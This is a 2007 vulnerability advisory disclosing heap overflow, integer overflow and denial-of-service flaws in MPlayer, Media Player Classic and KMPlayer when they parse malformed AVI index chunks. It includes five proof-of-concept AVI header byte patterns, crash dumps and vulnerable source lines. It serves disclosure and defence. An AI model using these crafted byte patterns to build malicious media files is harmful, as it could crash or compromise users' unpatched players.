<<< Date Index >>>     <<< Thread Index >>>

CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities



  CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities


  Code Audit Labs (http://www.vulnhunt.com) Code Audit for some popular
media player and discovered some vulnerabilities.

  one heap overflow was discovered in MPlayer.
  one heap overflow and one integer overflow were discovered in media
player classic(mpc) and other produces base on mpc like mympc and
StormPlayer).
  Some D.o.S (raise 100% cpu ) were discovred in KMPlayer.

  By tricking a user into opening a specially crafted media file,
an attacker who exploit heap overflow in MPlayer or media player classic
could potential execute arbitrary code with the user's privileges.


Original LINK:
==============
http://www.vulnhunt.com/advisories/CAL-20070912-1_Multiple_vendor_produce_handling_AVI_file_vulnerabilities.txt


Affected Product
=================

1 MPlayer 1.0rc1 and prior (we tested version 20070729)
2 media player classic v6.4.9.0 and prior; and other produces base on it.
 ( mympc 1.0.0.1 and StormPlayer 1.0.4)
3 KMPlayer v2.9.3.1210 and prior


Technical Description
=====================

those vulnerabilities are discoered via playing with AVI
1) indx truck size
2) wLongsPerEntry
3) nEntriesInuse

Olny build 5 testcases

test case 1 (new_avihead_poc1.avi)
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10

indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

test case 2 (new_avihead_poc2.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF

indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF

test case 3 (new_avihead_poc3.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10

indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

test case 4 (new_avihead_poc4.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 01 00 64 73 20 00 00 10

indx truck size 0x0000ff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

test case 5 (new_avihead_poc5.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 04 00 64 73 10 00 00 40

indx truck size 0x0000ff00
wLongsPerEntry 0x0004
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x40000010


TEST RESULT
+---------+-----------+-----------+-----------+-----------+----------+
| produce | testcase1 | testcase2 | testcase3 | testcase4 |testcase5 |
+---------+-----------+-----------+-----------+-----------+----------+
| wmp     |  ok       |  ok       |   ok      |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| mplayer |  ok       |  ok       |  HO/CRASH |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| mpc     |  HO       |  HO       |  HO       |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
|KMPlayer | RAISE CPU | RAISE CPU | RAISE CPU |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| mympc   |  HO       |  HO       |  HO       |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
|StormPlay|  HO       |  HO       |  HO       |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+
| xplayer |  ok       |  ok       |   ok      |   ok      |  ok      |
+---------+-----------+-----------+-----------+-----------+----------+


LITTLE ANALYSIS
===============

MPlayer svn 20070729 (last version)

1:new_mplayer_avihead_poc3.avi null pointer in winxp or glibc 2.5(depend on compile option).
if glibc <2.5(maybe prior) or win2000 sp4 ,it will be heap overflow.

   vulnerability code in libmpdemux/aviheader.c:

    232       print_avisuperindex_chunk(s,MSGL_V);
    233
    234       if( ((chunksize/4)/s->wLongsPerEntry) < s->nEntriesInUse){
235 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index chunk\n");
    236         s->nEntriesInUse = (chunksize/4)/s->wLongsPerEntry;
    237       }
    238
    239       // Check and fix this useless crap
    240       if(s->wLongsPerEntry != sizeof (avisuperindex_entry)/4) {
241 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index chunk size: %u\n",s->wLongsPerEntry);
    242           s->wLongsPerEntry = sizeof(avisuperindex_entry)/4;
    243       }
244 s->aIndex = calloc(s->nEntriesInUse, sizeof (avisuperindex_entry)); 245 s->stdidx = calloc(s->nEntriesInUse, sizeof (avistdindex_chunk));
    246
    247       // now the real index of indices
    248       for (i=0; i<s->nEntriesInUse; i++) {
    249           chunksize-=16;


that's funny, the above code still can be bypassed because of incorrect check order.

    and example code
    calloc(0x10000001, 0x10);

    it will return NULL in winxp or gligc 2.5
it will return 0x10 sizes heap in glibc <2.5(maybe prior) or win2000 sp4


0:000> g
(54c.284): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a7e740 ebx=024eecb8 ecx=00000000 edx=01414930 esi=ffffff00 edi=ffffff00 eip=0053b084 esp=0022e5e0 ebp=0000b6d0 iopl=0 nv up ei ng nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00200286
gmplayer+0x13b084:
0053b084 89741500 mov [ebp+edx],esi ss:0023:01420000=02cc1b9e
0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0000b6d0 00000000 00000000 00000000 00000000 gmplayer+0x13b084


media player classic v6.4.9.0 (last version)
--------------------------------------------
there are many produces base on media player classic.
all of produces are affected.

1:new_avihead_poc1.avi heap overflow

(270.198): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=060fa8b0 ebx=060ff000 ecx=00000011 edx=00000000 esi=060fa86c edi=060ff000 eip=006b8a4a esp=05a3f1e8 ebp=05a3f1f0 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 *** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\xx\mpc2kxp6490\mplayerc.exe
mplayerc+0x2b8a4a:
006b8a4a f3a5 rep movsd ds:060fa86c=73640001 es:060ff000=????????
0:003> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
05a3f1f0 005a02d6 060ff000 060fa86c 00000044 mplayerc+0x2b8a4a
00000000 00000000 00000000 00000000 00000000 mplayerc+0x1a02d6

2: new_avihead_poc2.avi
   new_avihead_poc3.avi

VERIFIER STOP 00000004: pid 0x870: extreme size request

        029B0000 : Heap handle
        FFFFFF08 : Size requested
        00000000 :
        00000000 :


(870.a88): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=ffffff08 ecx=7c93eb05 edx=05a3ea68 esi=00000004 edi=029b0000 eip=7c921230 esp=05a3ec9c ebp=05a3ecb0 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
7c921230 cc               int     3

in a word, assume indx truck size is indx_truck_size,
the code like:
        buf =malloc(indx_truck_size+8)
        it will trigger integer overflow.


KMPlayer v2.9.3.1210 (last version)
-----------------------------------
1:new_avihead_poc1.avi D.o.S
2:new_avihead_poc2.avi D.o.S
3:new_avihead_poc3.avi D.o.S


DISCLOSURE TIMELINE:
====================
1: 2007-07-30 notice MPlayer vendor
2: 2007-07-31 the vendor reply
3: 2007-09-12 release this report


About Us:
=========
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com

EOF


--
Code Audit Labs
http://www.vulnhunt.com/